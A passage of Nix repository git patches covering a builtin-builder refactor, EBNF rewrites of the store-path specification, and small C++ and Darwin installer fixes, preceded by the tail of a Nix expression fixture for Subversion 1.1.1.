javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); inherit pythonBindings ; src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); inherit sslSupport ; swig = (if (pythonBindings || javaSwigBindings) then swig else null); })) +({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); })) From 619ca631d07218dfe04bb53e5abb855ecf2bb67a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 12 Feb 2024 15:29:48 +0100 Subject: [PATCH 445/654] Fix "may be used uninitialized" warning --- src/libstore/store-api.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 439c9530c..e3715343e 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -847,7 +847,7 @@ void Store::substitutePaths(const StorePathSet & paths) if (!willSubstitute.empty()) try { std::vector subs; - for (auto & p : willSubstitute) subs.push_back(DerivedPath::Opaque{p}); + for (auto & p : willSubstitute) subs.emplace_back(DerivedPath::Opaque{p}); buildPaths(subs); } catch (Error & e) { logWarning(e.info()); From a9b69b2fff8b33bc62234f8031f9acf257d9fbe0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 12 Feb 2024 16:34:59 +0100 Subject: [PATCH 446/654] builtin:{unpack-channel,buildenv}: Get output path from the derivation Similar to 1ee42c5b88eb0533ebcf8b2579ec82f2be80e4b2, get the "out" path from the derivation (and complain if it doesn't exist), rather than getting it from the environment. --- src/libstore/build/local-derivation-goal.cc | 13 +++++++------ src/libstore/build/local-derivation-goal.hh | 2 +- src/libstore/builtins.hh | 10 ++++++++-- src/libstore/builtins/buildenv.cc | 6 ++++-- src/libstore/builtins/buildenv.hh | 4 +++- src/libstore/builtins/fetchurl.cc | 15 ++++++--------- src/libstore/builtins/unpack-channel.cc | 6 ++++-- 7 files changed, 33 insertions(+), 23 deletions(-) diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 2f60d2f38..b373c74b2 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -2130,16 +2130,17 @@ void LocalDerivationGoal::runChild() try { logger = makeJSONLogger(*logger); - BasicDerivation & drv2(*drv); - for (auto & e : drv2.env) - e.second = rewriteStrings(e.second, inputRewrites); + std::map outputs; + for (auto & e : drv->outputs) + outputs.insert_or_assign(e.first, + worker.store.printStorePath(scratchOutputs.at(e.first))); if (drv->builder == "builtin:fetchurl") - builtinFetchurl(drv2, netrcData); + builtinFetchurl(*drv, outputs, netrcData); else if (drv->builder == "builtin:buildenv") - builtinBuildenv(drv2); + builtinBuildenv(*drv, outputs); else if (drv->builder == "builtin:unpack-channel") - builtinUnpackChannel(drv2); + builtinUnpackChannel(*drv, outputs); else throw Error("unsupported builtin builder '%1%'", drv->builder.substr(8)); _exit(0); diff --git a/src/libstore/build/local-derivation-goal.hh b/src/libstore/build/local-derivation-goal.hh index 88152a645..f25cb9424 100644 --- a/src/libstore/build/local-derivation-goal.hh +++ b/src/libstore/build/local-derivation-goal.hh @@ -106,7 +106,7 @@ struct LocalDerivationGoal : public DerivationGoal RedirectedOutputs redirectedOutputs; /** - * The outputs paths used during the build. + * The output paths used during the build. * * - Input-addressed derivations or fixed content-addressed outputs are * sometimes built when some of their outputs already exist, and can not diff --git a/src/libstore/builtins.hh b/src/libstore/builtins.hh index d201fb3ac..93558b49e 100644 --- a/src/libstore/builtins.hh +++ b/src/libstore/builtins.hh @@ -6,7 +6,13 @@ namespace nix { // TODO: make pluggable. -void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData); -void builtinUnpackChannel(const BasicDerivation & drv); +void builtinFetchurl( + const BasicDerivation & drv, + const std::map & outputs, + const std::string & netrcData); + +void builtinUnpackChannel( + const BasicDerivation & drv, + const std::map & outputs); } diff --git a/src/libstore/builtins/buildenv.cc b/src/libstore/builtins/buildenv.cc index 9283251ac..1ed7b39cc 100644 --- a/src/libstore/builtins/buildenv.cc +++ b/src/libstore/builtins/buildenv.cc @@ -161,7 +161,9 @@ void buildProfile(const Path & out, Packages && pkgs) debug("created %d symlinks in user environment", state.symlinks); } -void builtinBuildenv(const BasicDerivation & drv) +void builtinBuildenv( + const BasicDerivation & drv, + const std::map & outputs) { auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); @@ -169,7 +171,7 @@ void builtinBuildenv(const BasicDerivation & drv) return i->second; }; - Path out = getAttr("out"); + auto out = outputs.at("out"); createDirs(out); /* Convert the stuff we get from the environment back into a diff --git a/src/libstore/builtins/buildenv.hh b/src/libstore/builtins/buildenv.hh index b24633e27..8e112e176 100644 --- a/src/libstore/builtins/buildenv.hh +++ b/src/libstore/builtins/buildenv.hh @@ -45,6 +45,8 @@ typedef std::vector Packages; void buildProfile(const Path & out, Packages && pkgs); -void builtinBuildenv(const BasicDerivation & drv); +void builtinBuildenv( + const BasicDerivation & drv, + const std::map & outputs); } diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index a9f2e748e..4fb67f933 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -6,7 +6,10 @@ namespace nix { -void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) +void builtinFetchurl( + const BasicDerivation & drv, + const std::map & outputs, + const std::string & netrcData) { /* Make the host's netrc data available. Too bad curl requires this to be stored in a file. It would be nice if we could just @@ -24,14 +27,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) if (!dof) throw Error("'builtin:fetchurl' must be a fixed-output derivation"); - auto getAttr = [&](const std::string & name) { - auto i = drv.env.find(name); - if (i == drv.env.end()) throw Error("attribute '%s' missing", name); - return i->second; - }; - - Path storePath = getAttr("out"); - auto mainUrl = getAttr("url"); + auto storePath = outputs.at("out"); + auto mainUrl = drv.env.at("url"); bool unpack = getOr(drv.env, "unpack", "") == "1"; /* Note: have to use a fresh fileTransfer here because we're in diff --git a/src/libstore/builtins/unpack-channel.cc b/src/libstore/builtins/unpack-channel.cc index ba04bb16c..6f68d4c0b 100644 --- a/src/libstore/builtins/unpack-channel.cc +++ b/src/libstore/builtins/unpack-channel.cc @@ -3,7 +3,9 @@ namespace nix { -void builtinUnpackChannel(const BasicDerivation & drv) +void builtinUnpackChannel( + const BasicDerivation & drv, + const std::map & outputs) { auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); @@ -11,7 +13,7 @@ void builtinUnpackChannel(const BasicDerivation & drv) return i->second; }; - Path out = getAttr("out"); + auto out = outputs.at("out"); auto channelName = getAttr("channelName"); auto src = getAttr("src"); From 91557df4a78e47fdadcea59fbca7751511b73bf5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 12 Feb 2024 11:16:12 -0500 Subject: [PATCH 447/654] Apply suggestions from code review Co-authored-by: Robert Hensing --- doc/manual/src/SUMMARY.md.in | 2 +- doc/manual/src/protocols/store-path.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index e6390c60a..d86372845 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -106,7 +106,7 @@ - [Architecture and Design](architecture/architecture.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - - [Exact Store Path Specification](protocols/store-path.md) + - [Store Path Specification](protocols/store-path.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) - [Glossary](glossary.md) - [Contributing](contributing/index.md) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md index d1c35b05e..e7bc050e7 100644 --- a/doc/manual/src/protocols/store-path.md +++ b/doc/manual/src/protocols/store-path.md @@ -47,7 +47,7 @@ where For either the outputs built from derivations, paths copied to the store hashed that area single file hashed directly, or the via a hash algorithm other than [SHA-256][sha-256]. - (in that case "source" is used; it's silly, but it's done that way for compatibility). + (in that case "source" is used; this is only necessary for compatibility). `` is the name of the output (usually, "out"). For content-addressed store objects, ``, is always "out". From ac1301ddfdc0d92a23378f2ea75b221740c15bab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 12 Feb 2024 11:16:53 -0500 Subject: [PATCH 448/654] Convert store path "grammar" to EBNF --- doc/manual/src/protocols/store-path.md | 70 +++++++++++++++----------- 1 file changed, 40 insertions(+), 30 deletions(-) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md index e7bc050e7..d5dec77b5 100644 --- a/doc/manual/src/protocols/store-path.md +++ b/doc/manual/src/protocols/store-path.md @@ -5,66 +5,69 @@ This is the complete specification for how store paths are calculated. Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to. But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful. -```bnf - ::= /- +```ebnf +store-path = store-dir "/" digest "-" name ``` where -- `` = base-32 representation of the first 160 bits of a [SHA-256] hash of `
`
+- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `pre`
 
   Th is :the hash part of the store name
 
-- `
` = the string `:sha256:::`;
+- `pre` = the string
+
+  ```ebnf
+  type ":" sha256 ":" inner-digest ":" store ":" name
+  ```
 
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
   (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
 
-- `` = the name of the store object.
+- `name` = the name of the store object.
 
-- `` = the [store directory](@docroot@/store/store-path.md#store-directory)
+- `store` = the [store directory](@docroot@/store/store-path.md#store-directory)
 
-- `` = one of:
+- `type` = one of:
 
-  - ```bnf
-    text:::...
+  - ```ebnf
+    "text" ( ":" store-path )*
     ```
 
     for encoded derivations written to the store.
-    ` ... ` are the store paths referenced by this path.
-    Those are encoded in the form described by ``.
+    The optional trailing store paths are the references of the store object.
 
-  - ```bnf
-    source:::...::self
+  - ```ebnf
+    "source" ( ":" store-path )*
     ```
 
     For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
     Just like in the text case, we can have the store objects referenced by their paths.
     Additionally, we can have an optional `:self` label to denote self reference.
 
-  - ```bnf
-    output:
+  - ```ebnf
+    "output:" id
     ```
 
     For either the outputs built from derivations,
     paths copied to the store hashed that area single file hashed directly, or the via a hash algorithm other than [SHA-256][sha-256].
     (in that case "source" is used; this is only necessary for compatibility).
 
-    `` is the name of the output (usually, "out").
-    For content-addressed store objects, ``, is always "out".
+    `id` is the name of the output (usually, "out").
+    For content-addressed store objects, `id`, is always "out".
 
-- `` = base-16 representation of a SHA-256 hash of ``
+- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-pre`
 
-- `` = one of the following based on ``:
+- `inner-pre` = one of the following based on `type`:
 
-  - if `` = `text:...`:
+  - if `type` = `"text:" ...`:
 
     the string written to the resulting store path.
 
-  - if `` = `source:...`:
+  - if `type` = `"source:" ...`:
 
     the the hash of the [Nix Archive (NAR)] serialization of the [file system object](@docroot@/store/file-system-object.md) of the store object.
 
-  - if `` = `output:`:
+  - if `type` = `"output:" id`:
 
     - For input-addressed derivation outputs:
 
@@ -72,31 +75,38 @@ where
 
     - For content-addressed store paths:
 
-      the string `fixed:out:::`, where
+      the string
 
-      - `` = one of:
+      ```ebnf
+      "fixed:out:" rec algo ":" hash ":"
+      ```
+
+      where
+
+      - `rec` = one of:
 
         - `r:` hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - `` (empty string) for hashes of the flat (single file) serialization
 
-      - `` = `md5`, `sha1` or `sha256`
+      - `algo` = `md5`, `sha1` or `sha256`
 
-      - `` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
+      - `hash` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
 
-      Note that `` = `out`, regardless of the name part of the store path.
-      Also note that NAR + SHA-256 must not use this case, and instead must use the `` = `source:...` case.
+      Note that `id` = `out`, regardless of the name part of the store path.
+      Also note that NAR + SHA-256 must not use this case, and instead must use the `type` = `"source:" ...` case.
 
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
 [sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
 
 ## Historical Note
 
-The `` = `source:...` and `` = `output:out` grammars technically overlap, in that both can represent data hashed by its SHA-256 NAR serialization.
+The `type` = `"source:" ...` and `type` = `"output:out"` grammars technically overlap in purpose,
+in that both can represent data hashed by its SHA-256 NAR serialization.
 
 The original reason for this way of computing names was to prevent name collisions (for security).
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
-The former would have an `` starting with `output:out:`, while the latter would have an `` starting with `source:`.
+The former would have an `inner-pre` starting with `output:out:`, while the latter would have an `inner-pre` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).

From 95190e68ed8f6c152f8ba01b2da7baeacb342c0e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:21:54 -0500
Subject: [PATCH 449/654] =?UTF-8?q?Mention=20the=20use=20of=20Extended=20B?=
 =?UTF-8?q?ackus=E2=80=93Naur=20form?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 doc/manual/src/protocols/store-path.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index d5dec77b5..57da808f9 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -2,6 +2,8 @@
 
 This is the complete specification for how store paths are calculated.
 
+The format of this specification is close to [Extended Backus–Naur form](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form), but must deviate for a few things such as hash functions which we treat as bidirectional for specification purposes.
+
 Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to.
 But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful.
 

From 30f6b0f9c55407207bd421b9a5446b455acd1e8e Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:22:08 -0500
Subject: [PATCH 450/654] `pre` -> `fingerprint` in store path grammar

As suggested by @roberth in
https://github.com/NixOS/nix/pull/9295#discussion_r1486402040.

Thanks!
---
 doc/manual/src/protocols/store-path.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 57da808f9..649bb4c45 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -12,11 +12,11 @@ store-path = store-dir "/" digest "-" name
 ```
 where
 
-- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `pre`
+- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `fingerprint`
 
   Th is :the hash part of the store name
 
-- `pre` = the string
+- `fingerprint` = the string
 
   ```ebnf
   type ":" sha256 ":" inner-digest ":" store ":" name
@@ -57,9 +57,9 @@ where
     `id` is the name of the output (usually, "out").
     For content-addressed store objects, `id`, is always "out".
 
-- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-pre`
+- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-fingerprint`
 
-- `inner-pre` = one of the following based on `type`:
+- `inner-fingerprint` = one of the following based on `type`:
 
   - if `type` = `"text:" ...`:
 
@@ -108,7 +108,7 @@ in that both can represent data hashed by its SHA-256 NAR serialization.
 
 The original reason for this way of computing names was to prevent name collisions (for security).
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
-The former would have an `inner-pre` starting with `output:out:`, while the latter would have an `inner-pre` starting with `source:`.
+The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).

From 0862d7ce57f7e16cf7f8ded3db7586a20fa8da28 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:26:02 -0500
Subject: [PATCH 451/654] Move around non-terminals

---
 doc/manual/src/protocols/store-path.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 649bb4c45..61f9d1604 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -12,9 +12,13 @@ store-path = store-dir "/" digest "-" name
 ```
 where
 
+- `name` = the name of the store object.
+
+- `store-dir` = the [store directory](@docroot@/store/store-path.md#store-directory)
+
 - `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `fingerprint`
 
-  Th is :the hash part of the store name
+  This the hash part of the store name
 
 - `fingerprint` = the string
 
@@ -25,10 +29,6 @@ where
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
   (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
 
-- `name` = the name of the store object.
-
-- `store` = the [store directory](@docroot@/store/store-path.md#store-directory)
-
 - `type` = one of:
 
   - ```ebnf

From 4c3e4d6d7167e4fbd284eb00063882b8442e3e99 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:33:06 -0500
Subject: [PATCH 452/654] Sections, EBNF tweaks

---
 doc/manual/src/protocols/store-path.md | 34 +++++++++++++++++---------
 1 file changed, 22 insertions(+), 12 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 61f9d1604..ff075b3b6 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -7,6 +7,8 @@ The format of this specification is close to [Extended Backus–Naur form](https
 Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to.
 But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful.
 
+## Store path proper
+
 ```ebnf
 store-path = store-dir "/" digest "-" name
 ```
@@ -20,10 +22,10 @@ where
 
   This the hash part of the store name
 
-- `fingerprint` = the string
+## Fingerprint
 
-  ```ebnf
-  type ":" sha256 ":" inner-digest ":" store ":" name
+- ```ebnf
+  fingerprint = type ":" sha256 ":" inner-digest ":" store ":" name
   ```
 
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
@@ -32,14 +34,14 @@ where
 - `type` = one of:
 
   - ```ebnf
-    "text" ( ":" store-path )*
+    | "text" ( ":" store-path )*
     ```
 
     for encoded derivations written to the store.
     The optional trailing store paths are the references of the store object.
 
   - ```ebnf
-    "source" ( ":" store-path )*
+    | "source" ( ":" store-path )*
     ```
 
     For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
@@ -47,7 +49,7 @@ where
     Additionally, we can have an optional `:self` label to denote self reference.
 
   - ```ebnf
-    "output:" id
+    | "output:" id
     ```
 
     For either the outputs built from derivations,
@@ -59,6 +61,8 @@ where
 
 - `inner-digest` = base-16 representation of a SHA-256 hash of `inner-fingerprint`
 
+## Inner fingerprint
+
 - `inner-fingerprint` = one of the following based on `type`:
 
   - if `type` = `"text:" ...`:
@@ -77,8 +81,6 @@ where
 
     - For content-addressed store paths:
 
-      the string
-
       ```ebnf
       "fixed:out:" rec algo ":" hash ":"
       ```
@@ -87,15 +89,23 @@ where
 
       - `rec` = one of:
 
-        - `r:` hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
+        - ```ebnf
+          | "r:"
+          ```
+          hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
-        - `` (empty string) for hashes of the flat (single file) serialization
+        - ```ebnf
+          |
+          ```
+          (empty string) for hashes of the flat (single file) serialization
 
-      - `algo` = `md5`, `sha1` or `sha256`
+      - ```ebf
+        algo = "md5" | "sha1" | "sha256"
+        ```
 
       - `hash` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
 
-      Note that `id` = `out`, regardless of the name part of the store path.
+      Note that `id` = `"out"`, regardless of the name part of the store path.
       Also note that NAR + SHA-256 must not use this case, and instead must use the `type` = `"source:" ...` case.
 
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR

From c873a140d711eb1c9f268f0903021bb68e764684 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 11:34:54 -0500
Subject: [PATCH 453/654] Apply suggestions from code review

Co-authored-by: Robert Hensing 
---
 doc/manual/src/protocols/store-path.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index ff075b3b6..2fc4bf7af 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -120,7 +120,7 @@ The original reason for this way of computing names was to prevent name collisio
 For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
 The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
-Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
+Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separating derivation-produced vs manually-hashed content-addressed data like this was not useful.
 Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
 This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
 It also removes the ambiguity from the grammar.

From 5169f5f4d9743fa10a8578625d2c290141949d54 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:01:54 -0500
Subject: [PATCH 454/654] Apply suggestions from code review

Co-authored-by: Robert Hensing 
---
 doc/manual/src/protocols/store-path.md | 2 +-
 src/libstore/store-api.cc              | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 2fc4bf7af..1f619e6a2 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -111,7 +111,7 @@ where
 [Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
 [sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
 
-## Historical Note
+### Historical Note
 
 The `type` = `"source:" ...` and `type` = `"output:out"` grammars technically overlap in purpose,
 in that both can represent data hashed by its SHA-256 NAR serialization.
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 1fb6cdce7..4238cbbf5 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -69,7 +69,7 @@ StorePath Store::followLinksToStorePath(std::string_view path) const
 The exact specification of store paths is in `protocols/store-path.md`
 in the Nix manual. These few functions implement that specification.
 
-If changes do these functions go behind mere implementation changes but
+If changes to these functions go beyond mere implementation changes i.e.
 also update the user-visible behavior, please update the specification
 to match.
 */

From 898fd1e48d117c7cd28bbc04cd230450f1df9adc Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:04:37 -0500
Subject: [PATCH 455/654] Update doc/manual/src/protocols/store-path.md

---
 doc/manual/src/protocols/store-path.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 1f619e6a2..595c7a10e 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -121,6 +121,6 @@ For instance, the thinking was that it shouldn't be feasible to come up with a d
 The former would have an `inner-fingerprint` starting with `output:out:`, while the latter would have an `inner-fingerprint` starting with `source:`.
 
 Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separating derivation-produced vs manually-hashed content-addressed data like this was not useful.
-Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
+Now, data that is content-addressed with SHA-256 + NAR-serialization always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
 This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
 It also removes the ambiguity from the grammar.

From f29d2a9d11c6b1c4cb8011e45dc45d99e4d572bd Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 12 Feb 2024 12:30:28 -0500
Subject: [PATCH 456/654] Small EBNF fix

---
 doc/manual/src/protocols/store-path.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index 595c7a10e..fcf8038fc 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -95,11 +95,11 @@ where
           hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - ```ebnf
-          |
+          | ""
           ```
           (empty string) for hashes of the flat (single file) serialization
 
-      - ```ebf
+      - ```ebnf
         algo = "md5" | "sha1" | "sha256"
         ```
 

From 64cbd4c05a413eae55cde784594472f921fc7367 Mon Sep 17 00:00:00 2001
From: Anton Samokhvalov 
Date: Mon, 12 Feb 2024 23:37:40 +0300
Subject: [PATCH 457/654] Update nar-info-disk-cache.cc

fix case when asserts are no-op, like in release build
---
 src/libstore/nar-info-disk-cache.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/nar-info-disk-cache.cc b/src/libstore/nar-info-disk-cache.cc
index 310105c75..07beb8acb 100644
--- a/src/libstore/nar-info-disk-cache.cc
+++ b/src/libstore/nar-info-disk-cache.cc
@@ -209,7 +209,7 @@ public:
 
             {
                 auto r(state->insertCache.use()(uri)(time(0))(storeDir)(wantMassQuery)(priority));
-                assert(r.next());
+                if (!r.next()) { abort(); }
                 ret.id = (int) r.getInt(0);
             }
 

From 64a076fe0678ee46fbec1446df1fcfbb713cfdf6 Mon Sep 17 00:00:00 2001
From: "Travis A. Everett" 
Date: Tue, 13 Feb 2024 01:18:08 -0600
Subject: [PATCH 458/654] install-darwin: fix symbolic perms for install cmd

The symbolic form in use here doesn't seem to have an effect
in either the BSD or coreutils install commands, leaving the
daemon plist with empty permissions. This seems to cause its
own problems.

I think I've got the right symbolic syntax now :)
---
 scripts/install-darwin-multi-user.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/scripts/install-darwin-multi-user.sh b/scripts/install-darwin-multi-user.sh
index 766f81bde..24c9052f9 100644
--- a/scripts/install-darwin-multi-user.sh
+++ b/scripts/install-darwin-multi-user.sh
@@ -102,7 +102,7 @@ poly_extra_try_me_commands() {
 poly_configure_nix_daemon_service() {
     task "Setting up the nix-daemon LaunchDaemon"
     _sudo "to set up the nix-daemon as a LaunchDaemon" \
-          /usr/bin/install -m -rw-r--r-- "/nix/var/nix/profiles/default$NIX_DAEMON_DEST" "$NIX_DAEMON_DEST"
+          /usr/bin/install -m "u=rw,go=r" "/nix/var/nix/profiles/default$NIX_DAEMON_DEST" "$NIX_DAEMON_DEST"
 
     _sudo "to load the LaunchDaemon plist for nix-daemon" \
           launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist

From ce19338f9fa4e8fa1fea7faf33c0f2c384e590dd Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 13:30:17 +0100
Subject: [PATCH 459/654] update glossary entry on store types

the interesting information is on the proper pages, and is now presented
a bit more prominently.

the paragraph was a bit confusing to read, also because an anchor link
to an inline definition was in the middle of the sentence. "local store"
now has its own glossary entry.
---
 doc/manual/src/glossary.md | 23 +++++++++++++----------
 1 file changed, 13 insertions(+), 10 deletions(-)

